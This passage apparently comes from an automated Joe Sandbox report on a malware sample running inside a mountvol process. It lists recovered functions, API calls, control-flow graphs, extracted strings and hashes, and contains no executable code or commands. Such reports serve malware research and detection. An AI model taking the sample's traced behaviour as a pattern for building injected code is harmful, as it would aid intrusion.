                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 835f40c7e7b7763ab2c5f7ada43634d4e13d09ab0aed1bbaebda76f51d3e3e59
                                                                                        • Instruction ID: e12062c744b0c89dde9c3166ebeabb027dd03e5ab142abe18e416aa22a0377be
                                                                                        • Opcode Fuzzy Hash: 835f40c7e7b7763ab2c5f7ada43634d4e13d09ab0aed1bbaebda76f51d3e3e59
                                                                                        • Instruction Fuzzy Hash: CD900221601404434540B26889449065015ABE6211755D121B099D550D875989696665
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3198d62267e11037b36df035cb91bf3a165582d945d4471d8db412e823500be5
                                                                                        • Instruction ID: 9f476a277984ec16e252119b197a68a8328369cc0850f6dd279923be9ffc7b1a
                                                                                        • Opcode Fuzzy Hash: 3198d62267e11037b36df035cb91bf3a165582d945d4471d8db412e823500be5
                                                                                        • Instruction Fuzzy Hash: 2A900221211C0443D600B6684D14B07101587D5303F55D115B0159554CCB1589656521
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c796e819a3cc825a561567618e02b5965b869d0ef7437528e38c87b5ffa3ec87
                                                                                        • Instruction ID: 7747e8cd619e6b3271d423fdfa0b6b603ea4167fdc3cbe7b4b625de106e52486
                                                                                        • Opcode Fuzzy Hash: c796e819a3cc825a561567618e02b5965b869d0ef7437528e38c87b5ffa3ec87
                                                                                        • Instruction Fuzzy Hash: 0D90022160140903D501B2584504616101A87D5241F95D022B1029555ECB258A96B131
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0f94573fc9adb54cdf5c2c616e3dbe3960ab823f5e660f2ac493e2627cfca7ac
                                                                                        • Instruction ID: cf3163d3f4af7f49e1ea0279a4fa4a3dbd63523ed373a4d02b4641894c2e224c
                                                                                        • Opcode Fuzzy Hash: 0f94573fc9adb54cdf5c2c616e3dbe3960ab823f5e660f2ac493e2627cfca7ac
                                                                                        • Instruction Fuzzy Hash: 6290026120180803D540B6584904607101587D5302F55D011B2069555E8B298D557135
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d65e1a39059c547c92837e179f9a919db84821a4569e9fd415186219690dd396
                                                                                        • Instruction ID: fc62408aa6bcae35cc78a11cd852e7a097091ea3fd4c2417320655679fc36e05
                                                                                        • Opcode Fuzzy Hash: d65e1a39059c547c92837e179f9a919db84821a4569e9fd415186219690dd396
                                                                                        • Instruction Fuzzy Hash: 3090022921340403D580B258550860A101587D6202F95E415B001A558CCB15896D6321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d99bd267bf0dee95029cffb8c20d9e28ccfc6c123f3f2a0c351041a3144c769f
                                                                                        • Instruction ID: 8920801b42da6f0d00906f8568742aab0c79e1a3e8aa0b7b99ff6865de542ffb
                                                                                        • Opcode Fuzzy Hash: d99bd267bf0dee95029cffb8c20d9e28ccfc6c123f3f2a0c351041a3144c769f
                                                                                        • Instruction Fuzzy Hash: 3D90022130140403D540B25855186065015D7E6301F55E011F0419554CDB15895A6222
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 17691f136242a9113fb45339414eb98ef49eb2414c3cec02d03abfb2b8c36f46
                                                                                        • Instruction ID: 8c19bdca990487b88cce45f0dfb4412e22117d58dd8a2ecd3fab36b435ebb8d5
                                                                                        • Opcode Fuzzy Hash: 17691f136242a9113fb45339414eb98ef49eb2414c3cec02d03abfb2b8c36f46
                                                                                        • Instruction Fuzzy Hash: 1A900221242445535945F2584504507501697E5241795D012B1419950C8726995AE621

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 447 2a43d30-2a43d78 call 2a4b7c0 450 2a43e84-2a43e8a 447->450 451 2a43d7e-2a43df8 call 2a4b8a0 call 2a347a0 call 2a213e0 call 2a41f00 447->451 460 2a43e00-2a43e14 Sleep 451->460 461 2a43e75-2a43e7c 460->461 462 2a43e16-2a43e28 460->462 461->460 465 2a43e7e 461->465 463 2a43e4a-2a43e63 call 2a46290 462->463 464 2a43e2a-2a43e48 call 2a461f0 462->464 469 2a43e68-2a43e6b 463->469 464->469 465->450 469->461
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02A43E0B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: PCF`$net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-2541284691
                                                                                        • Opcode ID: be9b7b8454c07fb5ab589a22d0b3e4e98d1e9e15556487143f6e73ec081bf435
                                                                                        • Instruction ID: bc995b4f5d3f69b25945d8ebfa511838fd5902cfa4d6253205d940ee5290e7f5
                                                                                        • Opcode Fuzzy Hash: be9b7b8454c07fb5ab589a22d0b3e4e98d1e9e15556487143f6e73ec081bf435
                                                                                        • Instruction Fuzzy Hash: 343193B1A41205BFDB14DFA4C984FEBB7B9EB84704F10456DEA1D6B240DB70AA41CFA4

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 470 2a30e48-2a30e72 472 2a30e74 470->472 473 2a30ebe-2a30ef9 470->473 472->473 477 2a30f15-2a30f30 473->477 478 2a30efb 473->478 483 2a30f32-2a30f43 477->483 484 2a30f6f-2a30f71 477->484 480 2a30f03 478->480 481 2a30efd-2a30f02 478->481 482 2a30f04-2a30f06 480->482 481->482 485 2a30f79-2a30f80 481->485 490 2a30f08 482->490 491 2a30f5e 482->491 486 2a30f81 483->486 487 2a30f45-2a30f47 483->487 488 2a30f96-2a3100e call 2a4b8f0 call 2a4c300 call 2a347a0 call 2a213e0 call 2a41f00 484->488 489 2a30f74 484->489 485->486 492 2a30f91 486->492 487->491 505 2a31030-2a31035 488->505 506 2a31010-2a31021 PostThreadMessageW 488->506 489->492 493 2a30f76 489->493 493->485 506->505 507 2a31023-2a3102d 506->507 507->505
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 0-2720052585
                                                                                        • Opcode ID: c7f0e158a60a8482a1386cc0a35d7e8b294f512bd0064633ffc00473cfb059c8
                                                                                        • Instruction ID: 0a37f6a891cbce22c01ea47a6e30061fa8139afcc8d33ce0dcc9b0d95ebfa243
                                                                                        • Opcode Fuzzy Hash: c7f0e158a60a8482a1386cc0a35d7e8b294f512bd0064633ffc00473cfb059c8
                                                                                        • Instruction Fuzzy Hash: BF41BD35A00348ABC7229F68CC41BDEBF78EF85760F1441DAF544AB282DB719946CBE5

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 508 2a30f5f-2a30f72 509 2a30f96-2a3100e call 2a4b8f0 call 2a4c300 call 2a347a0 call 2a213e0 call 2a41f00 508->509 510 2a30f74 508->510 526 2a31030-2a31035 509->526 527 2a31010-2a31021 PostThreadMessageW 509->527 511 2a30f91 510->511 512 2a30f76-2a30f81 510->512 512->511 527->526 528 2a31023-2a3102d 527->528 528->526
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: aefb0618ea6ddd378aafc290b4ee4b8a04458ff5f97e032c069a9bfbf668c530
                                                                                        • Instruction ID: 7b95be8915982df66a8f656d6eccd2e900254e06a6c64b79107cf7d7d91227ae
                                                                                        • Opcode Fuzzy Hash: aefb0618ea6ddd378aafc290b4ee4b8a04458ff5f97e032c069a9bfbf668c530
                                                                                        • Instruction Fuzzy Hash: 66210531D403487BDB21AFA48D45F9FBF799F41B50F0440A5FA447B181DB74A6068BE6

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: f2fa8528c8f6790cb206864bd82a578688acf55823e3ee9a82a07b0758d42055
                                                                                        • Instruction ID: c73391794ee38373bc1f8a8c02249fc46df258baf9127e9f2fa9e194270b2cd9
                                                                                        • Opcode Fuzzy Hash: f2fa8528c8f6790cb206864bd82a578688acf55823e3ee9a82a07b0758d42055
                                                                                        • Instruction Fuzzy Hash: BF11C631D4135876EB219BE48D42FDF7B799F41B94F044055FA047B280DBB4A6068BE6

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(p1h163LmP,00000111,00000000,00000000), ref: 02A3101D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: p1h163LmP$p1h163LmP
                                                                                        • API String ID: 1836367815-2720052585
                                                                                        • Opcode ID: 465016eab324623648abcdd6f0ec632a6e54e7ba0c4f32c1fd28321f11e27b1e
                                                                                        • Instruction ID: 60079da35f3ce07def8d1aa35e0556380befe83a44f412d35a5dd5618b5c024e
                                                                                        • Opcode Fuzzy Hash: 465016eab324623648abcdd6f0ec632a6e54e7ba0c4f32c1fd28321f11e27b1e
                                                                                        • Instruction Fuzzy Hash: CD01D631D413587AEB21AB908D42FDF7B7C9F41B94F048055FA087B280DBB4AA068BE5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: c1c77d0f3211c598c18127bdba9dbc35c5cc9560734b6b73cd827ef055394663
                                                                                        • Instruction ID: 21f4fc002a3147c2e334b6f1e78ab0b09fae2899ecdc2e7b545a41b66ee6ffd1
                                                                                        • Opcode Fuzzy Hash: c1c77d0f3211c598c18127bdba9dbc35c5cc9560734b6b73cd827ef055394663
                                                                                        • Instruction Fuzzy Hash: FB315075E0020A9FDB04DFE8C8809EFB7B9FF88304B108559E505EB214DB71EA058BA0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: bd421228db4a7fabe8c8277f9f606b1e7982930b6fa03fc96d32ac9490e562f9
                                                                                        • Instruction ID: a43eaf6c6579c2575924f926469c8400813e2ac74d69277460f730ddfaf778eb
                                                                                        • Opcode Fuzzy Hash: bd421228db4a7fabe8c8277f9f606b1e7982930b6fa03fc96d32ac9490e562f9
                                                                                        • Instruction Fuzzy Hash: 993130B5E1020AAFDB14DFD8DC809EFB7B9BF88304B108559E505EB214DB75EE058BA0
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A34812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction ID: e6a3f7b327b616d221397645f5697e1d83c022a2ec8ea66abd10d72d4da15f67
                                                                                        • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction Fuzzy Hash: A2011EB5E4020DABDB10DBA4DD81FADB3799B44718F0042A5E90897241FA31EB548B91
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A3858E,00000010,?,?,?,00000044,?,00000010,02A3858E,?,?,?), ref: 02A49BC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 99cb036976d090cb023c6e3df59440f8df3d85b8747fefd199d365e3845223e7
                                                                                        • Instruction ID: aa9ac63ef8a80a76fd9c3f0469d115c5446e4c7c6bb74366ab20eed244cdcabe
                                                                                        • Opcode Fuzzy Hash: 99cb036976d090cb023c6e3df59440f8df3d85b8747fefd199d365e3845223e7
                                                                                        • Instruction Fuzzy Hash: 1C01D2B2204208BFDB04DE99DC90EEB77AEAF8C754F008508BA0DE3241D630F8518BA4
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A29EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 39d9e5d1015314edf8a7aef286db47df410313485978cde054b999cc0f539575
                                                                                        • Instruction ID: 4458b0aeeaa621da4ad2e2a116bfae7ffc2e1d09acb0fa29665a2ac9822e8ab2
                                                                                        • Opcode Fuzzy Hash: 39d9e5d1015314edf8a7aef286db47df410313485978cde054b999cc0f539575
                                                                                        • Instruction Fuzzy Hash: 9DF065733C13143AE22062E99D42FD7768D9BC0BA5F240026FA0CEB1C0DE96B8514AE5
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A29EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 9021841f0c83a4f7e739e44e9c1b1e132e83f9bf739a80a037aaf92bf19721aa
                                                                                        • Instruction ID: 0e25247e3d8d54628b651156953ac26379c69ebde700f8435ca95d19b866864d
                                                                                        • Opcode Fuzzy Hash: 9021841f0c83a4f7e739e44e9c1b1e132e83f9bf739a80a037aaf92bf19721aa
                                                                                        • Instruction Fuzzy Hash: F6E0D8733C031136E23062A88E42FDB664E9FC0B91F20001AF60DBB1C0CEA5BD518AA4
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02A31C59,?,02A4603B,02A31C59,02A4592F,02A4603B,?,02A31C59,02A4592F,00001000,?,?,00000000), ref: 02A49ABF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction ID: dc1fcf2342f8cf710cd80c6796092d79ad54ecd7a193e918f8695ef92e0ef81b
                                                                                        • Opcode Fuzzy Hash: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction Fuzzy Hash: A1E065B2244614BBDB10EEA8DC41FAB37ADEFC9714F004419F908A7242DB31BC118AB8
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,DC37B48D,00000007,00000000,00000004,00000000,02A34019,000000F4), ref: 02A49B0F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction ID: 0f7848af7b20c0dea6517bad3fcd13ea0ab09e3358617c8c75a5917e93994008
                                                                                        • Opcode Fuzzy Hash: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction Fuzzy Hash: CBE09272244204BBD710EE58DC41FAB37ADEFC9714F004419F90CA7242CA31B8118BB4
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02A385FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 6cb78963987e9668112ff3aa1bac996998751e9adf7809c92cc006f44e5b64e6
                                                                                        • Instruction ID: 8a897538bad9a8d1d76ac36ea805514f553e680d5488a71cbc8b6bed5984bb03
                                                                                        • Opcode Fuzzy Hash: 6cb78963987e9668112ff3aa1bac996998751e9adf7809c92cc006f44e5b64e6
                                                                                        • Instruction Fuzzy Hash: 0BE086B12442042FFF246BB8DC85F6A33589B88768F584661F91CDB2C1EF7DF9528154
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02A385FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 464b6a068705e0c9a1b80bc16bb93a8936320854d6295a877843447179a0b0e6
                                                                                        • Instruction ID: 088cbfc0a6cb8576939698c98180c93f0cb7e12a071915f168592698760e7a86
                                                                                        • Opcode Fuzzy Hash: 464b6a068705e0c9a1b80bc16bb93a8936320854d6295a877843447179a0b0e6
                                                                                        • Instruction Fuzzy Hash: 9FE0D8B11443042FEB206768DCC5FAA33586B8C728F540650B9189B1C1DF78F9428254
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02A31F50,02A4826F,02A4592F,02A31F20), ref: 02A383F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 6a6884d01d6b116145fa740ee76c83bd96f9af7db86c38acf200d708e3b6a312
                                                                                        • Instruction ID: 861248bb0236605b5b192838a1717e587cf5af2e800df2f6299ff04d439f33ae
                                                                                        • Opcode Fuzzy Hash: 6a6884d01d6b116145fa740ee76c83bd96f9af7db86c38acf200d708e3b6a312
                                                                                        • Instruction Fuzzy Hash: B4D05E726847053FF650E6F4CD46F56368E9B40794F1500A6F90CE77C2EE65F80089E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5bb6043a4154258612f48f8cf0c5a5a5582acf078362c22212a68d5994404c8d
                                                                                        • Instruction ID: 794cec5cb94770d2047999fb01a9fb99c07e9b8c7ac8574f3c82c8bdfe2c542a
                                                                                        • Opcode Fuzzy Hash: 5bb6043a4154258612f48f8cf0c5a5a5582acf078362c22212a68d5994404c8d
                                                                                        • Instruction Fuzzy Hash: 59C080D65445471DF71377F06C457172508CB40354F894096F44CD77C6EF19C01745D0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bfcd26a3e8e36b8f5e85152e3f80d22456c2346be39909f0c4cf92e6e14d222b
                                                                                        • Instruction ID: ce31df0a777d17846721123f29d5c507b37d14033ec504d8225410298107afa8
                                                                                        • Opcode Fuzzy Hash: bfcd26a3e8e36b8f5e85152e3f80d22456c2346be39909f0c4cf92e6e14d222b
                                                                                        • Instruction Fuzzy Hash: ADB09B719015D5C7DE51E760470871B7D1467D5701F29C461E2034641E4739C1E5F175
                                                                                        Memory Dump Source
